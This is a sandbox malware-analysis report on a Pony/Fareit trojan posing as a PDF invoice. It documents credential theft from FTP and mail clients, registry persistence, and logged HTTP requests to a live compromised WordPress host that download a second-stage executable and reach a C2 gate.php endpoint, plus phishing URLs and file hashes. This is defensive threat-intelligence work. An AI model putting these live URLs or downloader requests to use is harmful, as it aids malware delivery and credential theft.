TT93846563647_pdf.exe
This report is generated from a file or URL submitted to this webservice on March 6th 2017 14:05:50 (UTC) and action script Heavy Anti-Evasion
Guest System: Windows 7 32 bit, Home Premium, 6.1 (build 7601), Service Pack 1
Report generated by
Falcon Sandbox v6.20 © Hybrid Analysis
Incident Response
Risk Assessment
- Credential Stealer
-
Scans for artifacts that may help identify the target
Touched instant messenger related registry keys
Tries to steal FTP credentials - Persistence
- Modifies auto-execute functionality by setting/creating a value in the registry
- Fingerprint
-
Reads the active computer name
Scans for artifacts that may help identify the target - Evasive
- Possibly checks for the presence of an Antivirus engine
- Spreading
- Tries to access unusual system drive letters
- Network Behavior
- Contacts 2 domains and 1 host. View all details
Indicators
Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.
-
Malicious Indicators 12
-
Anti-Detection/Stealthyness
-
Creates a resource fork (ADS) file (often used to hide data)
- details
- "<Input Sample>" created file "%APPDATA%\java.exe\:Zone.Identifier:$DATA"
- source
- API Call
- relevance
- 8/10
-
Creates a resource fork (ADS) file (often used to hide data)
-
External Systems
-
Detected Emerging Threats Alert
- details
-
Detected alert "ET TROJAN Fareit/Pony Downloader Checkin 3" (SID: 2014234, Rev: 10, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.)
Detected alert "ET POLICY Windows 98 User-Agent Detected - Possible Malware or Non-Updated System" (SID: 2007695, Rev: 21, Severity: 1) categorized as "Potential Corporate Privacy Violation"
Detected alert "ET TROJAN Pony Downloader HTTP Library MSIE 5 Win98" (SID: 2014562, Rev: 3, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.)
Detected alert "ET POLICY Unsupported/Fake Internet Explorer Version MSIE 5." (SID: 2016870, Rev: 11, Severity: 1) categorized as "Potential Corporate Privacy Violation"
Detected alert "ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious" (SID: 2021697, Rev: 2, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.)
Detected alert "ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious" (SID: 2022239, Rev: 4, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.) - source
- Suricata Alerts
- relevance
- 10/10
-
Sample was identified as malicious by a large number of Antivirus engines
- details
- 12/59 Antivirus vendors marked sample as malicious (20% detection rate)
- source
- External System
- relevance
- 10/10
-
Sample was identified as malicious by at least one Antivirus engine
- details
- 12/59 Antivirus vendors marked sample as malicious (20% detection rate)
- source
- External System
- relevance
- 8/10
-
Detected Emerging Threats Alert
-
Network Related
-
Malicious artifacts seen in the context of a contacted host
- details
-
Found malicious artifacts related to "166.62.27.56" (ASN: 26496, Owner: GoDaddy.com, LLC): ...
URL: http://tamansimalem.com/wp-admin/js/chinaindex/index.php?email=blargo@iadb.org (AV positives: 8/64 scanned on 03/06/2017 01:35:43)
URL: http://www.mytripwiser.com/login/gmail.php (AV positives: 7/65 scanned on 03/06/2017 00:55:30)
URL: http://ppapmoozamiz.com/ti3yrigg (AV positives: 14/67 scanned on 03/04/2017 20:02:26)
URL: http://ppapmoozamiz.com/2brscfs (AV positives: 11/67 scanned on 03/04/2017 20:01:43)
URL: https://digitalkannada.com/2016/08/23/cant-release-kaveri-water-ti-tamilnadu-govt-should-fix-max-rs-120-multiplex-ticket-rates-for-kannada-movies-wont-ask-apology-says-ramya-acb-complaint-against-arvind-jadhav-curfew-lifted-from-parts/ (AV positives: 2/64 scanned on 03/04/2017 10:10:40)
File SHA256: c5faac6cbbabb5825a8746a23419b311c20115a92eb2b85929d2e9a55ba896e1 (AV positives: 9/58 scanned on 03/02/2017 09:14:07)
File SHA256: 5c5b37dcaf5b3af87757a97ebf30feaa2a03e3677c95a6303ff50b91ea8aa6fe (AV positives: 11/59 scanned on 03/01/2017 15:26:05)
File SHA256: cdc8b52c9402b72ef9c698027c0d2ea63058ed98b832a31d3ac57c9e7f8b35ed (AV positives: 1/56 scanned on 02/23/2017 00:42:23)
File SHA256: 47ece55c123658acad79b1f36a89fb3abb473792e6a203f4feef487fcaeb14b3 (AV positives: 3/55 scanned on 02/23/2017 00:20:32)
File SHA256: 9f89814b48fc3249bf67a8a6e4439d97391b10b99f02b3da9e38345be1f1ed3f (AV positives: 1/55 scanned on 02/21/2017 08:24:48) - source
- Network Traffic
- relevance
- 10/10
-
Malicious artifacts seen in the context of a contacted host
-
Pattern Matching
-
YARA signature match
- details
- YARA signature "pony" classified process "TT93846563647_pdf.exe" as "trojan,pony" based on indicators: "{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X},YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0,POST %s HTTP/1.0,Accept-Encoding: identity, *;q=0" (Author: Brian Wallace @botnet_hunter)
- source
- YARA Signature
- relevance
- 10/10
-
YARA signature match
-
Spyware/Information Retrieval
-
Scans for artifacts that may help identify the target
- details
-
"<Input Sample>" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS LIVE MAIL")
"<Input Sample>" (Path: "HKCU\SOFTWARE\MICROSOFT\INTERNET ACCOUNT MANAGER\ACCOUNTS")
"<Input Sample>" (Path: "HKCU\IDENTITIES\{57AB3677-534E-4173-8F92-6566F6F82F10}\SOFTWARE\MICROSOFT\INTERNET ACCOUNT MANAGER\ACCOUNTS")
"<Input Sample>" (Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\OUTLOOK\OMI ACCOUNT MANAGER\ACCOUNTS") - source
- Registry Access
- relevance
- 3/10
-
Touched instant messenger related registry keys
- details
- "<Input Sample>" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS LIVE MAIL")
- source
- Registry Access
- relevance
- 5/10
-
Tries to steal FTP credentials
- details
-
"Software\FlashPeak\BlazeFtp\Settings" (Indicator: "\blazeftp\")
"RushSite.xml" (Indicator: "rushsite.xml") - source
- String
- relevance
- 6/10
-
Scans for artifacts that may help identify the target
-
Unusual Characteristics
-
Checks for a resource fork (ADS) file
- details
- "<Input Sample>" checked file "C:\TT93846563647_pdf.exe\:Zone.Identifier:$DATA"
- source
- API Call
- relevance
- 5/10
-
Tries to access unusual system drive letters
- details
-
"<Input Sample>" touched "K:\"
"<Input Sample>" touched "L:\"
"<Input Sample>" touched "M:\"
"<Input Sample>" touched "N:\"
"<Input Sample>" touched "O:\"
"<Input Sample>" touched "P:\"
"<Input Sample>" touched "Q:\"
"<Input Sample>" touched "R:\"
"<Input Sample>" touched "S:\"
"<Input Sample>" touched "T:\"
"<Input Sample>" touched "U:\"
"<Input Sample>" touched "V:\"
"<Input Sample>" touched "W:\"
"<Input Sample>" touched "X:\"
"<Input Sample>" touched "Y:\" - source
- API Call
- relevance
- 9/10
-
Checks for a resource fork (ADS) file
-
Hiding 1 Malicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Suspicious Indicators 20
-
Environment Awareness
-
Reads the active computer name
- details
- "<Input Sample>" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME")
- source
- Registry Access
- relevance
- 5/10
-
Reads the active computer name
-
General
-
Opened the service control manager
- details
- "<Input Sample>" called "OpenSCManager" requesting access rights "SC_MANAGER_CONNECT" (0x1)
- source
- API Call
- relevance
- 10/10
-
Reads configuration files
- details
- "<Input Sample>" read file "%APPDATA%\Mozilla\Firefox\profiles.ini"
- source
- API Call
- relevance
- 4/10
-
Requested access to a system service
- details
-
"<Input Sample>" called "OpenService" to access the "ProtectedStorage" service
"<Input Sample>" called "OpenService" to access the "ProtectedStorage" service requesting "SERVICE_START" (0X10) access rights - source
- API Call
- relevance
- 10/10
-
Sent a control code to a service
- details
- "<Input Sample>" called "ControlService" and sent control code "0X400" to the service "ProtectedStorage"
- source
- API Call
- relevance
- 10/10
-
Opened the service control manager
-
Installation/Persistance
-
Modifies auto-execute functionality by setting/creating a value in the registry
- details
-
"<Input Sample>" (Access type: "CREATE"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN")
"<Input Sample>" (Access type: "SETVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN"; Key: "TT93846563647_PDF.EXE"; Value: "%APPDATA%\java.exe") - source
- Registry Access
- relevance
- 8/10
-
Modifies auto-execute functionality by setting/creating a value in the registry
-
Network Related
-
Found potential IP address in binary/memory
- details
-
"166.62.27.56"
"2.5.29.37" - source
- String
- relevance
- 3/10
-
Uses a User Agent typical for browsers, although no browser was ever launched
- details
- Found user agent(s): Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
- source
- Network Traffic
- relevance
- 10/10
-
Found potential IP address in binary/memory
-
Spyware/Information Retrieval
-
Checks on FTP client related files
- details
-
"<Input Sample>" opened file "C:\Program Files\Common Files\Ipswitch\WS_FTP\" (DesiredAccess: 1048577, OpenOptions: 16417)
"<Input Sample>" opened file "%APPDATA%\SmartFTP\" (DesiredAccess: 1048577, OpenOptions: 16417)
"<Input Sample>" opened file "%ALLUSERSPROFILE%\SmartFTP\" (DesiredAccess: 1048577, OpenOptions: 16417)
"<Input Sample>" opened file "%APPDATA%\TurboFTP\" (DesiredAccess: 1048577, OpenOptions: 16417)
"<Input Sample>" opened file "C:\ProgramData\TurboFTP\" (DesiredAccess: 1048577, OpenOptions: 16417)
"<Input Sample>" opened file "%APPDATA%\VanDyke\Config\Sessions\" (DesiredAccess: 1048577, OpenOptions: 16417)
"<Input Sample>" opened file "C:\ProgramData\VanDyke\Config\Sessions\" (DesiredAccess: 1048577, OpenOptions: 16417)
"<Input Sample>" opened file "%APPDATA%\FTPRush\" (DesiredAccess: 1048577, OpenOptions: 16417) - source
- API Call
- relevance
- 8/10
-
Contains ability to enumerate processes/modules/threads
- details
- CreateToolhelp32Snapshot@KERNEL32.DLL from TT93846563647_pdf.exe (PID: 3036) (Show Stream)
- source
- Hybrid Analysis Technology
- relevance
- 5/10
-
Checks on FTP client related files
-
System Destruction
-
Opens file with deletion access rights
- details
- "<Input Sample>" opened "%APPDATA%\java.exe" with delete access
- source
- API Call
- relevance
- 7/10
-
Opens file with deletion access rights
-
System Security
-
Modifies proxy settings
- details
-
"<Input Sample>" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
"<Input Sample>" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS") - source
- Registry Access
- relevance
- 10/10
-
Queries sensitive IE security settings
- details
- "<Input Sample>" (Path: "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SECURITY"; Key: "DISABLESECURITYSETTINGSCHECK")
- source
- Registry Access
- relevance
- 8/10
-
Modifies proxy settings
-
Unusual Characteristics
-
Imports suspicious APIs
- details
-
URLDownloadToFileA
RegOpenKeyExA
RegCloseKey
GetTempPathA
WriteFile
CopyFileA
GetModuleFileNameA
LoadLibraryExA
UnhandledExceptionFilter
GetModuleHandleA
CreateThread
GetTickCount
GetVersionExA
LoadLibraryA
GetStartupInfoA
GetProcAddress
FindFirstFileA
CreateFileA
WinExec
LockResource
GetCommandLineA
Sleep
FindResourceA
VirtualAlloc
ShellExecuteA
GetLastActivePopup
SetWindowsHookExA
FindWindowA
GetWindowThreadProcessId - source
- Static Parser
- relevance
- 1/10
-
Reads information about supported languages
- details
-
"<Input Sample>" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000409")
"<Input Sample>" (Path: "HKCU\CONTROL PANEL\INTERNATIONAL"; Key: "LOCALENAME")
"cmd.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000409") - source
- Registry Access
- relevance
- 3/10
-
Imports suspicious APIs
-
Hiding 5 Suspicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Informative 18
-
Environment Awareness
-
Contains ability to query the machine version
- details
- GetVersionExA@KERNEL32.DLL from TT93846563647_pdf.exe (PID: 3036) (Show Stream)
- source
- Hybrid Analysis Technology
- relevance
- 1/10
-
Queries volume information
- details
-
"<Input Sample>" queries volume information of "D:\" at 00047968-00003168-0000010C-109079707
"<Input Sample>" queries volume information of "C:\share" at 00047968-00003168-0000010C-109082152 - source
- API Call
- relevance
- 2/10
-
Queries volume information of an entire harddrive
- details
- "<Input Sample>" queries volume information of "D:\" at 00047968-00003168-0000010C-109079707
- source
- API Call
- relevance
- 8/10
-
Contains ability to query the machine version
-
General
-
Accesses System Certificates Settings
- details
- "<Input Sample>" (Path: "HKCU\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\MY"; Key: "")
- source
- Registry Access
- relevance
- 10/10
-
Contacts domains
- details
-
"www.tamansimalem.com"
"tamansimalem.com" - source
- Network Traffic
- relevance
- 1/10
-
Contacts server
- details
- "166.62.27.56:80"
- source
- Network Traffic
- relevance
- 1/10
-
Creates mutants
- details
-
"\Sessions\1\BaseNamedObjects\Local\_!MSFTHISTORY!_"
"\Sessions\1\BaseNamedObjects\Local\c:!users!i2tg58a!appdata!roaming!microsoft!windows!cookies!"
"\Sessions\1\BaseNamedObjects\Local\c:!users!i2tg58a!appdata!local!microsoft!windows!history!history.ie5!"
"\Sessions\1\BaseNamedObjects\Local\WininetStartupMutex"
"\Sessions\1\BaseNamedObjects\Local\WininetConnectionMutex"
"\Sessions\1\BaseNamedObjects\Local\WininetProxyRegistryMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZoneAttributeCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\c:!users!i2tg58a!appdata!local!microsoft!windows!temporary internet files!content.ie5!" - source
- Created Mutant
- relevance
- 3/10
-
GETs files from a webserver
- details
-
"GET /wp-admin/network/shit.exe HTTP/1.0
Host: tamansimalem.com
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)"
"GET /wp-admin/network/shit.exe HTTP/1.0
Host: www.tamansimalem.com
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)" - source
- Network Traffic
- relevance
- 5/10
-
Runs shell commands
- details
- "cmd /c ""%TEMP%\4127192.bat" "C:\TT93846563647_pdf.exe" "" on 2017-3-6.06:33:00.250
- source
- Monitored Target
- relevance
- 5/10
-
Spawns new processes
- details
-
Spawned process "<Input Sample>" (Show Process)
Spawned process "<Input Sample>" (Show Process)
Spawned process "cmd.exe" with commandline "cmd /c ""%TEMP%\4127192.bat" "C:\TT93846563647_pdf.exe" "" (Show Process) - source
- Monitored Target
- relevance
- 3/10
-
Accesses System Certificates Settings
-
Installation/Persistance
-
Connects to LPC ports
- details
- "<Input Sample>" connecting to "\ThemeApiPort"
- source
- API Call
- relevance
- 1/10
-
Dropped files
- details
- "4127192.bat" has type "ASCII text with CRLF CR line terminators"
- source
- Binary File
- relevance
- 3/10
-
Touches files in the Windows directory
- details
-
"<Input Sample>" touched file "%WINDIR%\Fonts\staticcache.dat"
"<Input Sample>" touched file "%WINDIR%\system32\en-US\user32.dll.mui"
"<Input Sample>" touched file "%WINDIR%\Globalization\Sorting\sortdefault.nls"
"<Input Sample>" touched file "%WINDIR%\WinSxS\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_5.82.7600.16385_en-us_020378a8991bbcc2\comctl32.dll.mui"
"<Input Sample>" touched file "%WINDIR%\system32\en-US\SETUPAPI.dll.mui"
"<Input Sample>" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches"
"<Input Sample>" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\cversions.1.db"
"<Input Sample>" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000c.db"
"<Input Sample>" touched file "%WINDIR%\wcx_ftp.ini"
"<Input Sample>" touched file "%WINDIR%\32BitFtp.ini" - source
- API Call
- relevance
- 7/10
-
Connects to LPC ports
-
Network Related
-
Found potential URL in binary/memory
- details
-
Heuristic match: "Font.Name"
Pattern match: "http://matrix.kladovka.net.ru"
Heuristic match: "mailto:matrix@kladovka.net.ru"
Pattern match: "http://tamansimalem.com/wp-admin/network/gate.php"
Pattern match: "http://www.facebook.com/"
Heuristic match: "\RhinoSoft.com"
Pattern match: "http://www.ibsensoftware.com/"
Pattern match: "http://tamansimalem.com/wp-admin/network/shit.exe" - source
- String
- relevance
- 10/10
-
Found potential URL in binary/memory
-
Spyware/Information Retrieval
-
Found a reference to a known community page
- details
-
"http://www.facebook.com/" (Indicator: "facebook.com")
"myspace1" (Indicator: "myspace") - source
- String
- relevance
- 7/10
-
Found a reference to a known community page
-
System Security
-
Opens the Kernel Security Device Driver (KsecDD) of Windows
- details
- "<Input Sample>" opened "\Device\KsecDD"
- source
- API Call
- relevance
- 10/10
-
Opens the Kernel Security Device Driver (KsecDD) of Windows
-
Unusual Characteristics
-
Found Delphi 4 - Delphi 2006 artifact
- details
- "TT93846563647_pdf.exe.bin" has a PE timestamp using the buggy magic timestamp 0x2A425E19.
- source
- Static Parser
- relevance
- 10/10
-
Matched Compiler/Packer signature
- details
- "TT93846563647_pdf.exe.bin" was detected as "Borland Delphi 4.0"
- source
- Static Parser
- relevance
- 10/10
-
Found Delphi 4 - Delphi 2006 artifact
File Details
TT93846563647_pdf.exe
- Filename
- TT93846563647_pdf.exe
- Size
- 1.9MiB (2000000 bytes)
- Type
- peexe executable
- Description
- PE32 executable (GUI) Intel 80386, for MS Windows
- Architecture
- WINDOWS
- SHA256
- befed3d3447792ccd490ff42394590b77a9bf76f1d2ecbeff10b2339672d8a45
- MD5
- dbc281b5540ee551ac11759c17810087
- SHA1
- edf164da7d7642bc215b00905bc148625971f497
- ssdeep
- 12288:NcXnG/tKENyGFrt6hWmINDbgUrBOnsX8AZERPQ9hSftysKkRllUQBI8YpfvkrGia:NcXGjF5tRlJ90IMcMR/jBI8Y5vAC0e
- imphash
- fa9304cdfa2a7cab0199775cffab3cd5
- authentihash
- 3b128383a3d814745efc7cb9d0658cce72672b7243d7d206eac168f8a7ee508e
- Compiler/Packer
- Borland Delphi 4.0
Classification (TrID)
- 37.4% (.EXE) Win32 Executable Delphi generic
- 34.5% (.SCR) Windows screen saver
- 11.9% (.EXE) Win32 Executable (generic)
- 5.4% (.EXE) Win16/32 Executable Delphi generic
- 5.2% (.EXE) Generic Win/DOS Executable
File Sections
Details | ||||||
---|---|---|---|---|---|---|
File Imports
Screenshots
Loading content, please wait...
Hybrid Analysis
Tip: Click an analysed process below to view more details.
Analysed 4 processes in total (System Resource Monitor).
-
TT93846563647_pdf.exe
(PID: 2748)
-
TT93846563647_pdf.exe
(PID: 3036)
- cmd.exe cmd /c ""%TEMP%\4127192.bat" "C:\TT93846563647_pdf.exe" " (PID: 3420)
- TT93846563647_pdf.exe (PID: 3168)
-
TT93846563647_pdf.exe
(PID: 3036)
Network Analysis
DNS Requests
Domain | Address | Registrar | Country |
---|---|---|---|
www.tamansimalem.com | 166.62.27.56 | - | United States |
tamansimalem.com | 166.62.27.56 | - | United States |
Contacted Hosts
IP Address | Port/Protocol | Associated Process | Details |
---|---|---|---|
166.62.27.56 |
80
TCP |
tt93846563647_pdf.exe PID: 3036 |
United States
ASN: 26496 (GoDaddy.com, LLC) |
Contacted Countries
HTTP Traffic
Endpoint | Request | URL | |
---|---|---|---|
166.62.27.56:80 | GET | 166.62.27.56/wp-admin/network/shit.exe | GET /wp-admin/network/shit.exe HTTP/1.0
Host: tamansimalem.com
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98) 301 Moved Permanently More Details |
166.62.27.56:80 | GET | 166.62.27.56/wp-admin/network/shit.exe | GET /wp-admin/network/shit.exe HTTP/1.0
Host: www.tamansimalem.com
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98) 302 Moved Temporarily More Details |
Memory Forensics
String | Context | Stream UID |
---|---|---|
http://www.facebook.com/ | Domain/IP reference | 00047896-00003036-60600-376-0040A875 |
http://tamansimalem.com/wp-admin/network/gate.php | Domain/IP reference | 00047896-00003036-60600-12-0040FD60 |
rhinosoft.com | Domain/IP reference | 00047896-00003036-60600-353-00408FD3 |
softx.org | Domain/IP reference | 00047896-00003036-60600-314-00407685 |
2.5.29.37 | Domain/IP reference | 00047896-00003036-60600-436-0040D3BE |
Suricata Alerts
Event | Category | Description | SID |
---|---|---|---|
local -> 166.62.27.56:80 (TCP) | A Network Trojan was detected | ET TROJAN Fareit/Pony Downloader Checkin 3 | 2014234 |
local -> 166.62.27.56:80 (TCP) | Potential Corporate Privacy Violation | ET POLICY Windows 98 User-Agent Detected - Possible Malware or Non-Updated System | 2007695 |
local -> 166.62.27.56:80 (TCP) | A Network Trojan was detected | ET TROJAN Pony Downloader HTTP Library MSIE 5 Win98 | 2014562 |
local -> 166.62.27.56:80 (TCP) | Potential Corporate Privacy Violation | ET POLICY Unsupported/Fake Internet Explorer Version MSIE 5. | 2016870 |
local -> 166.62.27.56:80 (TCP) | A Network Trojan was detected | ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious | 2021697 |
local -> 166.62.27.56:80 (TCP) | A Network Trojan was detected | ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious | 2022239 |
local -> 166.62.27.56:80 (TCP) | A Network Trojan was detected | ET TROJAN Fareit/Pony Downloader Checkin 3 | 2014234 |
local -> 166.62.27.56:80 (TCP) | Potential Corporate Privacy Violation | ET POLICY Windows 98 User-Agent Detected - Possible Malware or Non-Updated System | 2007695 |
local -> 166.62.27.56:80 (TCP) | A Network Trojan was detected | ET TROJAN Pony Downloader HTTP Library MSIE 5 Win98 | 2014562 |
local -> 166.62.27.56:80 (TCP) | Potential Corporate Privacy Violation | ET POLICY Unsupported/Fake Internet Explorer Version MSIE 5. | 2016870 |
local -> 166.62.27.56:80 (TCP) | A Network Trojan was detected | ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious | 2021697 |
local -> 166.62.27.56:80 (TCP) | A Network Trojan was detected | ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious | 2022239 |
Extracted Strings
Extracted Files
-
Informative Selection 1
-
-
4127192.bat
- Size
- 94B (94 bytes)
- Type
- ASCII text, with CRLF, CR line terminators
- Runtime Process
- cmd.exe (PID: 3420)
- MD5
- 3880eeb1c736d853eb13b44898b718ab
- SHA1
- 4eec9d50360cd815211e3c4e6bdd08271b6ec8e6
- SHA256
- 936d9411d5226b7c5a150ecaf422987590a8870c8e095e1caa072273041a86e7
-
Antelox commented 7 years ago updated